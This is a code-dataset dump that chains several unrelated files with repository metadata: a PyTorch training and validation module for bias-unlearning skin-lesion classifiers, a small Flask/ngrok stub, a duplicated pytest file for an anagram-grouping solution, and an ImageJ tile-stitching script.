] | 3
|
2021-09-10T21:51:01.000Z
|
2022-03-29T15:16:03.000Z
|
train_epoch_variations.py
|
pbevan1/Skin-Deep-Unlearning
|
b8802db8bd61bbf3fdeb10c9899a4117ae38e89c
|
[
"MIT"
] | null | null | null |
train_epoch_variations.py
|
pbevan1/Skin-Deep-Unlearning
|
b8802db8bd61bbf3fdeb10c9899a4117ae38e89c
|
[
"MIT"
] | null | null | null |
import numpy as np
from sklearn.metrics import roc_auc_score, accuracy_score
import torch
import torch.nn as nn
from torch.autograd import Variable
from globalbaz import args, DP, device
from tqdm import tqdm
from models import *
# Defining criterion with weighted loss based on bias to be unlearned
def criterion_func(df):
if args.instrument:
lst = df['instrument'].value_counts().sort_index().tolist()
lst2 = df['marked'].value_counts().sort_index().tolist()
elif args.instrument and args.rulers:
lst = df['instrument'].value_counts().sort_index().tolist()
lst2 = df['scale'].value_counts().sort_index().tolist()
else:
lst = df['marked'].value_counts().sort_index().tolist()
lst2 = df['scale'].value_counts().sort_index().tolist() # placeholder
sum_lst = sum(lst)
sum_lst2 = sum(lst2)
class_freq = []
class_freq2 = []
for i in lst:
class_freq.append(i / sum_lst * 100)
weights = torch.tensor(class_freq, dtype=torch.float32)
for i in lst2:
class_freq2.append(i / sum_lst2 * 100)
weights2 = torch.tensor(class_freq2, dtype=torch.float32)
weights = weights / weights.sum()
weights2 = weights2 / weights2.sum()
weights = 1.0 / weights
weights2 = 1.0 / weights2
weights = weights / weights.sum()
weights2 = weights2 / weights2.sum()
if args.debias_config != 'baseline': # Only printing auxiliary weights head if using debiasing head
print(f'weights_aux: {weights}')
print(f'weights_aux_2: {weights2}')
weights = weights.to(device)
weights2 = weights2.to(device)
# Note CrossEntropyLoss & BCEWithLogitsLoss includes the Softmax function so logits should be passed in (no softmax layer in model)
criterion = nn.BCEWithLogitsLoss() # nn.CrossEntropyLoss()
criterion_aux = nn.CrossEntropyLoss(weight=weights)
criterion_aux2 = nn.CrossEntropyLoss(weight=weights2)
return criterion, criterion_aux, criterion_aux2
# Defining one training epoch for baseline model
def train_epoch_baseline(model_encoder, model_classifier, loader, optimizer, criterion):
# Setting to train mode
model_encoder.train()
model_classifier.train()
train_loss = [] # creating loss list
bar = tqdm(loader) # using tqdm to display progress bar
for (data, target, _, _) in bar:
optimizer.zero_grad() # zeroing gradients
data, target = data.to(device), target.to(device) # sending data to GPU
feat_out = model_encoder(data) # creating feature representation using the encoder
logits = model_classifier(feat_out) # using the main classifier to get output logits
target = target.unsqueeze(1).type_as(logits) # unsqueezing to[batch_size,1] and same dtype as logits
loss = criterion(logits, target) # calculating loss using categorical crossentorpy
loss.backward() # backpropegating to calculate gradients
optimizer.step() # updating weights
loss_np = loss.detach().cpu().numpy() # sending loss to cpu
train_loss.append(loss_np) # appending loss to loss list
smooth_loss = sum(train_loss[-100:]) / min(len(train_loss), 100) # calculating smooth loss
bar.set_description('loss: %.5f, smth: %.5f' % (loss_np, smooth_loss)) # metrics for loading bar
return train_loss
# Defining one training epoch for learning not to learn model
def train_epoch_LNTL(model_encoder, model_classifier, model_aux, loader, optimizer, optimizer_aux, criterion, criterion_aux):
# setting models to train mode
model_encoder.train()
model_classifier.train()
model_aux.train()
# empty lists for training loss and auxiliary training loss
train_loss = []
train_loss_aux = []
# adding progress bar for easier monitoring during training
bar = tqdm(loader)
for (data, target, target_aux, target_aux2) in bar:
if args.rulers: # Switching to ruler labels
target_aux = target_aux2
# zeroing gradients
optimizer.zero_grad()
optimizer_aux.zero_grad()
# sending data and targets to GPU
data, target, target_aux = data.to(device), target.to(device), target_aux.to(device)
# predicting with model and getting feature maps and logits
feat_out = model_encoder(data) # creating feature representation using the encoder
logits = model_classifier(feat_out) # using the main classifier to get output logits
target = target.unsqueeze(1).type_as(logits) # unsqueezing to [batch_size,1] and same dtype as logits
# ######----------------Main Head & Pseudo Loss---------------###########
# taking pseudo prediction from output of auxillary head (output of softmax)
_, pseudo_pred_aux = model_aux(feat_out)
# loss for main prediction calculated using crossentropyloss and logits output
loss_main = criterion(logits, target)
# pseudo auxilary loss calculated
loss_pseudo_aux = torch.mean(torch.sum(pseudo_pred_aux * torch.log(pseudo_pred_aux), 1))
# pseudo auxiliary loss multiplied by lambda and added to main prediction loss
loss = loss_main + loss_pseudo_aux * args.lambdaa
# backpropegation to calculate gradients
loss.backward()
# updating weights
optimizer.step()
# ######-------------Auxiliary Head Classifier Update------------###########
# zeroing gradients from last step
optimizer.zero_grad()
optimizer_aux.zero_grad()
# predicting with model and getting feature maps and logits
feat_out = model_encoder(data) # creating feaure representation using the encoder
# applying gradient reversal to outputted features of main network
if args.GRL:
feat_out = grad_reverse(feat_out)
# getting logits from auxillary head output (gradient reversal applied ready for updating)
logits_aux, _ = model_aux(feat_out)
# calculating auxiliary loss
loss_aux = criterion_aux(logits_aux, target_aux)
# backpropegating to calculate gradients (with reversal since gradient reversal applied above)
loss_aux.backward()
# updating weights
optimizer.step()
optimizer_aux.step()
# sending losses to cpu for printing
loss_np = loss.detach().cpu().numpy()
loss_aux_np = loss_aux.detach().cpu().numpy()
# appending losses to lists
train_loss.append(loss_np)
train_loss_aux.append(loss_aux_np)
# calculating smooth losses
smooth_loss = sum(train_loss[-100:]) / min(len(train_loss), 100)
smooth_loss_aux = sum(train_loss_aux[-100:]) / min(len(train_loss_aux), 100)
bar.set_description('loss: %.5f, smth: %.5f, aux_loss: %.5f, aux_smth: %.5f' %
(loss_np, smooth_loss, loss_aux_np, smooth_loss_aux,))
return train_loss, train_loss_aux
# Defining one training epoch for learning not to learn
def train_epoch_TABE(model_encoder, model_classifier, model_aux, loader, optimizer, optimizer_aux,
optimizer_confusion, criterion, criterion_aux):
# setting lambda as tuning parameter for auxiliary loss
# setting models to train mode
model_encoder.train()
model_classifier.train()
model_aux.train()
# empty lists for training loss and auxiliary training loss
train_loss = []
train_loss_aux = []
# adding progress bar for easier monitoring during training
bar = tqdm(loader)
for (data, target, target_aux, target_aux2) in bar:
if args.rulers: # switching targets round if wanting to use rulers as target
target_aux = target_aux2
# zeroing gradients
optimizer.zero_grad()
optimizer_aux.zero_grad()
optimizer_confusion.zero_grad()
# sending data and targets to cpu
data, target, target_aux = data.to(device), target.to(device), target_aux.to(device)
# predicting with model and getting feature maps and logits
feat_out = model_encoder(data) # creating feaure representation using the encoder
logits = model_classifier(feat_out) # using the main classifier to get output logits
target = target.unsqueeze(1).type_as(logits) # unsqueezing to[batch_size,1] and same dtype as logits
# ######----------------Main Head & Pseudo Loss---------------###########
loss_main = criterion(logits, target) # using categorical cross entropy (softmax built in) to get loss
_, output_conf = model_aux(feat_out) # getting probabilities from auxiliary head
# defining uniform distribution for calculating KL divergence for confusion loss
uni_distrib = torch.FloatTensor(output_conf.size()).uniform_(0, 1)
uni_distrib = uni_distrib.to(device) # sending to GPU
uni_distrib = Variable(uni_distrib)
loss_conf = - args.alpha * (torch.sum(uni_distrib * torch.log(output_conf))) / float(output_conf.size(0)) # calculating confusion loss
loss = loss_main + loss_conf # adding main and confusion losses
# backpropegation to calculate gradients
loss.backward()
# updating weights
optimizer.step()
optimizer_confusion.step()
# ######-------------------------------Auxiliary Head Classifier Update-------------------------------###########
# zeroing gradients from last step
optimizer.zero_grad()
optimizer_aux.zero_grad()
# predicting with model and getting feature maps and logits
feat_out = model_encoder(data) # creating feaure representation using the encoder
# applying gradient reversal to outputted features of main network
if args.GRL:
feat_out = grad_reverse(feat_out)
# getting logits from auxillary head output (gradient reversal applied ready for updating)
logits_aux, _ = model_aux(feat_out)
# calculating auxiliary loss
loss_aux = criterion_aux(logits_aux, target_aux)
# backpropegating to calculate gradients (with reversal since gradient reversal applied above)
loss_aux.backward()
# updating weights
optimizer.step()
optimizer_aux.step()
# sending losses to cpu for printing
loss_np = loss.detach().cpu().numpy()
loss_aux_np = loss_aux.detach().cpu().numpy()
# appending losses to lists
train_loss.append(loss_np)
train_loss_aux.append(loss_aux_np)
# calculating smooth losses
smooth_loss = sum(train_loss[-100:]) / min(len(train_loss), 100)
smooth_loss_aux = sum(train_loss_aux[-100:]) / min(len(train_loss_aux), 100)
bar.set_description('loss: %.5f, smth: %.5f, aux_loss: %.5f, aux_smth: %.5f' %
(loss_np, smooth_loss, loss_aux_np, smooth_loss_aux,))
return train_loss, train_loss_aux
# Defining one training epoch for learning not to learn
def train_epoch_doubleTABE(model_encoder, model_classifier, model_aux, model_aux2, loader, optimizer, optimizer_aux,
optimizer_aux2, optimizer_confusion, criterion, criterion_aux, criterion_aux2):
# setting lambda as tuning parameter for auxiliary loss
# setting models to train mode
model_encoder.train()
model_classifier.train()
model_aux.train()
model_aux2.train()
# empty lists for training loss and auxiliary training loss
train_loss = []
train_loss_aux = []
train_loss_aux2 = []
# adding progress bar for easier monitoring during training
bar = tqdm(loader)
for (data, target, target_aux, target_aux2) in bar:
# zeroing gradients
optimizer.zero_grad()
optimizer_aux.zero_grad()
optimizer_aux2.zero_grad()
optimizer_confusion.zero_grad()
# sending data and targets to cpu
data, target, target_aux, target_aux2 = data.to(device), target.to(device), target_aux.to(device), target_aux2.to(device)
# predicting with model and getting feature maps and logits
feat_out = model_encoder(data) # creating feaure representation using the encoder
logits = model_classifier(feat_out) # using the main classifier to get output logits
target = target.unsqueeze(1).type_as(logits) # unsqueezing to[batch_size,1] and same dtype as logits
# ######----------------Main Head & Confusion Loss---------------###########
loss_main = criterion(logits, target) # using categorical cross entropy (softmax built in) to get loss
_, output_conf = model_aux(feat_out) # getting probabilities from auxiliary head
_, output_conf2 = model_aux2(feat_out) # getting probabilities from auxiliary head
# defining uniform distribution for calculating KL divergence for confusion loss
uni_distrib = torch.FloatTensor(output_conf.size()).uniform_(0, 1)
uni_distrib = uni_distrib.to(device) # sending to GPU
uni_distrib = Variable(uni_distrib)
loss_conf = - args.alpha * (torch.sum(uni_distrib * torch.log(output_conf))) / float(output_conf.size(0)) # calculating confusion loss
uni_distrib2 = torch.FloatTensor(output_conf2.size()).uniform_(0, 1)
uni_distrib2 = uni_distrib2.to(device) # sending to GPU
uni_distrib2 = Variable(uni_distrib2)
loss_conf2 = - args.alpha * (torch.sum(uni_distrib2 * torch.log(output_conf2))) / float(output_conf2.size(0)) # calculating confusion loss
loss = loss_main + loss_conf + loss_conf2 # adding main and confusion losses
# backpropegation to calculate gradients
loss.backward()
# updating weights
optimizer.step()
optimizer_confusion.step()
# ######-------------------------------Auxiliary Head Classifier Update-------------------------------###########
# zeroing gradients from last step
optimizer.zero_grad()
optimizer_aux.zero_grad()
optimizer_aux2.zero_grad()
# predicting with model and getting feature maps and logits
feat_out = model_encoder(data) # creating feaure representation using the encoder
# applying gradient reversal to outputted features of main network
if args.GRL:
feat_out = grad_reverse(feat_out)
# getting logits from auxillary head output (gradient reversal applied ready for updating)
logits_aux, _ = model_aux(feat_out)
logits_aux2, _ = model_aux2(feat_out)
# calculating auxiliary loss
loss_aux = criterion_aux(logits_aux, target_aux)
loss_aux2 = criterion_aux2(logits_aux2, target_aux2)
aux_losses = loss_aux + loss_aux2
# backpropegating to calculate gradients
aux_losses.backward()
# updating weights
optimizer.step()
optimizer_aux.step()
optimizer_aux2.step()
# sending losses to cpu for printing
loss_np = loss.detach().cpu().numpy()
loss_aux_np = loss_aux.detach().cpu().numpy() # sending loss to cpu
loss_aux2_np = loss_aux2.detach().cpu().numpy() # sending loss to cpu
# ------------------------------------------------------------------
# appending losses to loss lists
train_loss.append(loss_np)
train_loss_aux.append(loss_aux_np)
train_loss_aux2.append(loss_aux2_np)
# calculating smooth losses
smooth_loss = sum(train_loss[-100:]) / min(len(train_loss), 100)
smooth_loss_aux = sum(train_loss_aux[-100:]) / min(len(train_loss_aux), 100)
smooth_loss_aux2 = sum(train_loss_aux2[-100:]) / min(len(train_loss_aux2), 100)
# metrics to be displayed with progress bar
bar.set_description(
'loss: %.5f, smth: %.5f, aux_loss: %.5f, aux_loss2: %.5f, aux_smth: %.5f, aux_smth2: %.5f' %
(loss_np, smooth_loss, loss_aux_np, loss_aux2_np, smooth_loss_aux, smooth_loss_aux2))
return train_loss, train_loss_aux, train_loss_aux2
# Defining one training epoch for learning not to learn
def train_epoch_BOTH(model_encoder, model_classifier, model_aux, model_aux2, loader, optimizer, optimizer_aux,
optimizer_aux2, optimizer_confusion, criterion, criterion_aux, criterion_aux2):
# setting lambda as tuning parameter for auxiliary loss
# setting models to train mode
model_encoder.train()
model_classifier.train()
model_aux.train()
model_aux2.train()
# empty lists for training loss and auxiliary training loss
train_loss = []
train_loss_aux = []
train_loss_aux2 = []
bar = tqdm(loader) # using tqdm to show progress bar
for (data, target, target_aux_pre, target_aux2_pre) in bar:
optimizer.zero_grad()
optimizer_aux.zero_grad()
optimizer_aux2.zero_grad()
optimizer_confusion.zero_grad()
if args.switch_heads: # allowing heads to switch by switchin labels
target_aux = target_aux2_pre
target_aux2 = target_aux_pre
else:
target_aux = target_aux_pre
target_aux2 = target_aux2_pre
data, target, target_aux, target_aux2 = data.to(device), target.to(device), target_aux.to(
device), target_aux2.to(device) # sending data and targets to GPU
# predicting with model and getting feature maps and logits
feat_out = model_encoder(data) # creating feaure representation using the encoder
logits = model_classifier(feat_out) # using the main classifier to get output logits
target = target.unsqueeze(1).type_as(logits) # unsqueezing to[batch_size,1] and same dtype as logits
# ######---------Main Head & Confusion Loss & pseudo loss---------###########
loss_main = criterion(logits, target) # using categorical cross entropy (softmax built in) to get loss
_, output_conf = model_aux(feat_out) # getting probabilities from first auxiliary head
uni_distrib = torch.FloatTensor(output_conf.size()).uniform_(0, 1) # calculating uniform distribution
uni_distrib = uni_distrib.to(device) # sending to GPU
uni_distrib = Variable(uni_distrib)
loss_conf = - args.alpha * (torch.sum(uni_distrib * torch.log(output_conf))) / float(
output_conf.size(0)) # calculating confusion loss
_, pseudo_pred_aux = model_aux(feat_out) # taking pseudo prediction from output of auxillary head (output of softmax)
loss_pseudo_aux = torch.mean(
torch.sum(pseudo_pred_aux * torch.log(pseudo_pred_aux), 1)) # calculating auxiliary pseudo loss
loss = loss_main + loss_conf + loss_pseudo_aux * args.lambdaa # adding losses before backpropegation
loss.backward() # backpropegating loss to calculate gradients
optimizer.step() # updating weights
optimizer_confusion.step()
# ######----------------Auxiliary Head Classifier Update----------------###########
# zeroing gradients from last step
optimizer.zero_grad()
optimizer_aux.zero_grad()
optimizer_aux2.zero_grad()
# predicting with model and getting feature maps and logits
feat_out = model_encoder(data) # creating feaure representation using the encoder
# applying gradient reversal to outputted features of main network
if args.GRL:
feat_out = grad_reverse(feat_out)
# getting logits from auxillary head output (gradient reversal applied ready for updating)
logits_aux, _ = model_aux(feat_out)
logits_aux2, _ = model_aux2(feat_out)
# calculating auxiliary loss
if args.switch_heads:
loss_aux = criterion_aux2(logits_aux, target_aux) # calculating auxiliary loss
loss_aux2 = criterion_aux(logits_aux2, target_aux2) # calculating 2nd auxiliary loss
else:
loss_aux = criterion_aux(logits_aux, target_aux) # calculating auxiliary loss
loss_aux2 = criterion_aux2(logits_aux2, target_aux2) # calculating 2nd auxiliary loss
aux_losses = loss_aux + loss_aux2
# backpropegating to calculate gradients
aux_losses.backward()
# updating weights
optimizer.step()
optimizer_aux.step()
optimizer_aux2.step()
# sending losses to cpu for printing
loss_np = loss.detach().cpu().numpy()
loss_aux_np = loss_aux.detach().cpu().numpy() # sending loss to cpu
loss_aux2_np = loss_aux2.detach().cpu().numpy() # sending loss to cpu
# ------------------------------------------------------------------
# appending losses to loss lists
train_loss.append(loss_np)
train_loss_aux.append(loss_aux_np)
train_loss_aux2.append(loss_aux2_np)
# calculating smooth losses
smooth_loss = sum(train_loss[-100:]) / min(len(train_loss), 100)
smooth_loss_aux = sum(train_loss_aux[-100:]) / min(len(train_loss_aux), 100)
smooth_loss_aux2 = sum(train_loss_aux2[-100:]) / min(len(train_loss_aux2), 100)
# metrics to be displayed with progress bar
bar.set_description(
'loss: %.5f, smth: %.5f, aux_loss: %.5f, aux_loss2: %.5f, aux_smth: %.5f, aux_smth2: %.5f' % (
loss_np, smooth_loss, loss_aux_np, loss_aux2_np, smooth_loss_aux, smooth_loss_aux2))
return train_loss, train_loss_aux, train_loss_aux2
# Defining one training epoch for learning not to learn
def train_epoch_doubleLNTL(model_encoder, model_classifier, model_aux, model_aux2, loader, optimizer, optimizer_aux,
optimizer_aux2, criterion, criterion_aux, criterion_aux2):
# setting lambda as tuning parameter for auxiliary loss
# setting models to train mode
model_encoder.train()
model_classifier.train()
model_aux.train()
model_aux2.train()
# empty lists for training loss and auxiliary training loss
train_loss = []
train_loss_aux = []
train_loss_aux2 = []
bar = tqdm(loader) # using tqdm to show progress bar
for (data, target, target_aux, target_aux2) in bar:
optimizer.zero_grad()
optimizer_aux.zero_grad()
optimizer_aux2.zero_grad()
data, target, target_aux, target_aux2 = data.to(device), target.to(device), target_aux.to(
device), target_aux2.to(device) # sending data and targets to GPU
# predicting with model and getting feature maps and logits
feat_out = model_encoder(data) # creating feaure representation using the encoder
logits = model_classifier(feat_out) # using the main classifier to get output logits
target = target.unsqueeze(1).type_as(logits) # unsqueezing to[batch_size,1] and same dtype as logits
# ######----------------Main Head & Pseudo Losses---------------###########
loss_main = criterion(logits, target) # using categorical cross entropy (softmax built in) to get loss
_, pseudo_pred_aux = model_aux(feat_out) # taking pseudo prediction from output of auxillary head (output of softmax)
loss_pseudo_aux = torch.mean(
torch.sum(pseudo_pred_aux * torch.log(pseudo_pred_aux), 1)) # calculating auxiliary pseudo loss
_, pseudo_pred_aux2 = model_aux2(feat_out) # taking pseudo prediction from output of auxillary head (output of softmax)
loss_pseudo_aux2 = torch.mean(
torch.sum(pseudo_pred_aux2 * torch.log(pseudo_pred_aux2), 1)) # calculating auxiliary pseudo loss
loss = loss_main + (loss_pseudo_aux + loss_pseudo_aux2)*args.lambdaa # adding losses before backpropegation
loss.backward() # backpropegating loss to calculate gradients
optimizer.step() # updating weights
# ######-------------Auxiliary Head Classifier Update------------###########
# zeroing gradients from last step
optimizer.zero_grad()
optimizer_aux.zero_grad()
optimizer_aux2.zero_grad()
# predicting with model and getting feature maps and logits
feat_out = model_encoder(data) # creating feaure representation using the encoder
# applying gradient reversal to outputted features of main network
if args.GRL:
feat_out = grad_reverse(feat_out)
# getting logits from auxillary head output (gradient reversal applied ready for updating)
logits_aux, _ = model_aux(feat_out)
logits_aux2, _ = model_aux2(feat_out)
# calculating auxiliary loss
loss_aux = criterion_aux(logits_aux, target_aux) # calculating auxiliary loss
loss_aux2 = criterion_aux2(logits_aux2, target_aux2) # calculating 2nd auxiliary loss
aux_losses = loss_aux + loss_aux2
# backpropegating to calculate gradients
aux_losses.backward()
# updating weights
optimizer.step()
optimizer_aux.step()
optimizer_aux2.step()
# sending losses to cpu for printing
loss_np = loss.detach().cpu().numpy()
loss_aux_np = loss_aux.detach().cpu().numpy() # sending loss to cpu
loss_aux2_np = loss_aux2.detach().cpu().numpy() # sending loss to cpu
# ------------------------------------------------------------------
# appending losses to loss lists
train_loss.append(loss_np)
train_loss_aux.append(loss_aux_np)
train_loss_aux2.append(loss_aux2_np)
# calculating smooth losses
smooth_loss = sum(train_loss[-100:]) / min(len(train_loss), 100)
smooth_loss_aux = sum(train_loss_aux[-100:]) / min(len(train_loss_aux), 100)
smooth_loss_aux2 = sum(train_loss_aux2[-100:]) / min(len(train_loss_aux2), 100)
# metrics to be displayed with progress bar
bar.set_description(
'loss: %.5f, smth: %.5f, aux_loss: %.5f, aux_loss2: %.5f, aux_smth: %.5f, aux_smth2: %.5f' % (
loss_np, smooth_loss, loss_aux_np, loss_aux2_np, smooth_loss_aux, smooth_loss_aux2))
return train_loss, train_loss_aux, train_loss_aux2
# translations for testing (test-time augmentation)
def get_trans(img, I):
if I >= 4:
img = img.transpose(2, 3)
if I % 4 == 0:
return img
elif I % 4 == 1:
return img.flip(2)
elif I % 4 == 2:
return img.flip(3)
elif I % 4 == 3:
return img.flip(2).flip(3)
def val_epoch(model_encoder, model_classifier, loader, criterion, n_test=1, get_output=False):
# setting models to evaluation mode
model_encoder.eval()
model_classifier.eval()
# setting up storage lists
val_loss = []
LOGITS = []
PROBS = []
TARGETS = []
with torch.no_grad():
for (data, target, _, _) in tqdm(loader): # using tqdm for progress bar
data, target = data.to(device), target.to(device) # sending data to GPU
logits = torch.zeros((data.shape[0], args.out_dim)).to(device) # creating blank tensor for logits
probs = torch.zeros((data.shape[0], args.out_dim)).to(device) # creating blank tensor for probabilities
# using translations to test on same image in different positions and using voting for consensus
for I in range(n_test):
feat_out = model_encoder(get_trans(data, I)) # getting feature representation from encoder
l = model_classifier(feat_out) # getting logits from main classifier head
logits += l # adding logits to logits tensor
probs += torch.sigmoid(l) # adding probabilities to probabilities tensor
logits /= n_test # dividing logits by number of tests for consensus
probs /= n_test # dividing probabilities by number of tests for consensus
# appending logits, probabilities and targets to storage lists
LOGITS.append(logits.detach().cpu())
PROBS.append(probs.detach().cpu())
TARGETS.append(target.detach().cpu())
target = target.unsqueeze(1).type_as(logits) # Unsqueezing to[batch_size,1] and same dtype as logits
loss = criterion(logits, target) # getting batch loss
val_loss.append(loss.detach().cpu().numpy()) # getting batch validation loss
val_loss = np.mean(val_loss) # getting overall validation loss
# converting to numpy
LOGITS = torch.cat(LOGITS).numpy()
PROBS = torch.cat(PROBS).numpy()
TARGETS = torch.cat(TARGETS).numpy()
if get_output:
return PROBS, TARGETS
else:
acc = accuracy_score(TARGETS, np.round(PROBS)) # calculating accuracy, 0.5 threshold
auc = roc_auc_score(TARGETS, PROBS) # calculating area under the curve
return val_loss, acc, auc
| 45.713831
| 147
| 0.661647
| 3,613
| 28,754
| 5.053141
| 0.078328
| 0.034507
| 0.016432
| 0.010736
| 0.825108
| 0.803418
| 0.79312
| 0.779537
| 0.76913
| 0.760037
| 0
| 0.014807
| 0.234333
| 28,754
| 628
| 148
| 45.786624
| 0.814453
| 0.339153
| 0
| 0.70801
| 0
| 0.007752
| 0.026388
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023256
| false
| 0
| 0.020672
| 0
| 0.077519
| 0.005168
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dca02df300625c5289bb0f79e466f7a82544c5bb
| 93
|
py
|
Python
|
Subham Kumar Sahoo webapp/webapp.py
|
sksgit7/DigitalOcean
|
6aa3a4b2cf52e1c54f51b2edf096ed839825a01b
|
[
"MIT"
] | 14
|
2020-06-04T09:44:28.000Z
|
2020-09-30T12:08:02.000Z
|
Subham Kumar Sahoo webapp/webapp.py
|
sksgit7/DigitalOcean
|
6aa3a4b2cf52e1c54f51b2edf096ed839825a01b
|
[
"MIT"
] | 2
|
2020-06-05T16:43:09.000Z
|
2020-06-05T18:50:52.000Z
|
Subham Kumar Sahoo webapp/webapp.py
|
sksgit7/DigitalOcean
|
6aa3a4b2cf52e1c54f51b2edf096ed839825a01b
|
[
"MIT"
] | 3
|
2020-06-05T10:36:44.000Z
|
2020-06-06T06:21:23.000Z
|
from app import app
from flask_ngrok import run_with_ngrok
# run_with_ngrok(app)
# app.run()
| 18.6
| 38
| 0.795699
| 17
| 93
| 4.058824
| 0.411765
| 0.202899
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 93
| 5
| 39
| 18.6
| 0.851852
| 0.311828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f4abfd280998b5d570887861b9a00bb2a8f022a2
| 1,592
|
py
|
Python
|
tests/test_49.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_49.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
tests/test_49.py
|
sungho-joo/leetcode2github
|
ce7730ef40f6051df23681dd3c0e1e657abba620
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pytest
"""
Test 49. Group Anagrams
"""
@pytest.fixture(scope="session")
def init_variables_49():
from src.leetcode_49_group_anagrams import Solution
solution = Solution()
def _init_variables_49():
return solution
yield _init_variables_49
class TestClass49:
def test_solution_0(self, init_variables_49):
assert init_variables_49().groupAnagrams(["eat", "tea", "tan", "ate", "nat", "bat"]) == [
["bat"],
["nat", "tan"],
["ate", "eat", "tea"],
]
def test_solution_1(self, init_variables_49):
assert init_variables_49().groupAnagrams([""]) == [[""]]
def test_solution_2(self, init_variables_49):
assert init_variables_49().groupAnagrams(["a"]) == [["a"]]
#!/usr/bin/env python
import pytest
"""
Test 49. Group Anagrams
"""
@pytest.fixture(scope="session")
def init_variables_49():
from src.leetcode_49_group_anagrams import Solution
solution = Solution()
def _init_variables_49():
return solution
yield _init_variables_49
class TestClass49:
def test_solution_0(self, init_variables_49):
assert init_variables_49().groupAnagrams(["eat", "tea", "tan", "ate", "nat", "bat"]) == [
["bat"],
["nat", "tan"],
["ate", "eat", "tea"],
]
def test_solution_1(self, init_variables_49):
assert init_variables_49().groupAnagrams([""]) == [[""]]
def test_solution_2(self, init_variables_49):
assert init_variables_49().groupAnagrams(["a"]) == [["a"]]
| 22.422535
| 97
| 0.616834
| 186
| 1,592
| 4.967742
| 0.198925
| 0.253247
| 0.292208
| 0.123377
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.043619
| 0.222362
| 1,592
| 70
| 98
| 22.742857
| 0.702746
| 0.025126
| 0
| 0.947368
| 0
| 0
| 0.060484
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.263158
| false
| 0
| 0.105263
| 0.052632
| 0.473684
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
76263d71daf2034cfc92e0962e0fa9094679ad0f
| 1,411
|
py
|
Python
|
snippets/reg_and_stitching/stitch.py
|
michielkleinnijenhuis/EM
|
f46a9b11298919b359e80d9f23a7e824df1356cb
|
[
"Apache-2.0"
] | null | null | null |
snippets/reg_and_stitching/stitch.py
|
michielkleinnijenhuis/EM
|
f46a9b11298919b359e80d9f23a7e824df1356cb
|
[
"Apache-2.0"
] | null | null | null |
snippets/reg_and_stitching/stitch.py
|
michielkleinnijenhuis/EM
|
f46a9b11298919b359e80d9f23a7e824df1356cb
|
[
"Apache-2.0"
] | null | null | null |
from ij import IJ
inputdir = '/Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/tifs'
outputdir = '/Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/stitched/'
n_slices = 2
for slc in range(0, n_slices):
IJ.run("Grid/Collection stitching", "type=[Grid: row-by-row] order=[Right & Down ] grid_size_x=2 grid_size_y=2 tile_overlap=10 first_file_index_i=0 directory=/Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/tifs file_names=0001_m{iii}.tif output_textfile_name=TileConfiguration.txt fusion_method=[Linear Blending] regression_threshold=0.30 max/avg_displacement_threshold=2.50 absolute_displacement_threshold=3.50 compute_overlap subpixel_accuracy computation_parameters=[Save memory (but be slower)] image_output=[Fuse and display]");
IJ.saveAs("Tiff", "/Users/michielk/oxdata/P01/EM/M3/M3_S1_GNU/0001_fused.tif");
#
# run("Grid/Collection stitching", "type=[Grid: row-by-row] order=[Right & Down ] grid_size_x=2 grid_size_y=2 tile_overlap=10 first_file_index_i=0 directory=" + inputdir " file_names=" + slc + "_m{iii}.tif output_textfile_name=" + slc + "_TileConfiguration.txt fusion_method=[Linear Blending] regression_threshold=0.30 max/avg_displacement_threshold=2.50 absolute_displacement_threshold=3.50 compute_overlap subpixel_accuracy computation_parameters=[Save computation time (but use more RAM)] image_output=[Fuse and display]);
# saveAs("Tiff", outputdir + slc + "_fused.tif");
| 108.538462
| 544
| 0.779589
| 222
| 1,411
| 4.698198
| 0.396396
| 0.049856
| 0.072867
| 0.084372
| 0.803452
| 0.755513
| 0.707574
| 0.707574
| 0.707574
| 0.644295
| 0
| 0.04549
| 0.096386
| 1,411
| 12
| 545
| 117.583333
| 0.772549
| 0.415308
| 0
| 0
| 0
| 0.142857
| 0.838002
| 0.518879
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
52321c089e9dd3f1bb7119e916016ebb1db0224e
| 129
|
py
|
Python
|
wsgi.py
|
mzaglia/inpe_catalog
|
33d6d39df584923bcaf6f4d0dada8dbe4f08e147
|
[
"MIT"
] | null | null | null |
wsgi.py
|
mzaglia/inpe_catalog
|
33d6d39df584923bcaf6f4d0dada8dbe4f08e147
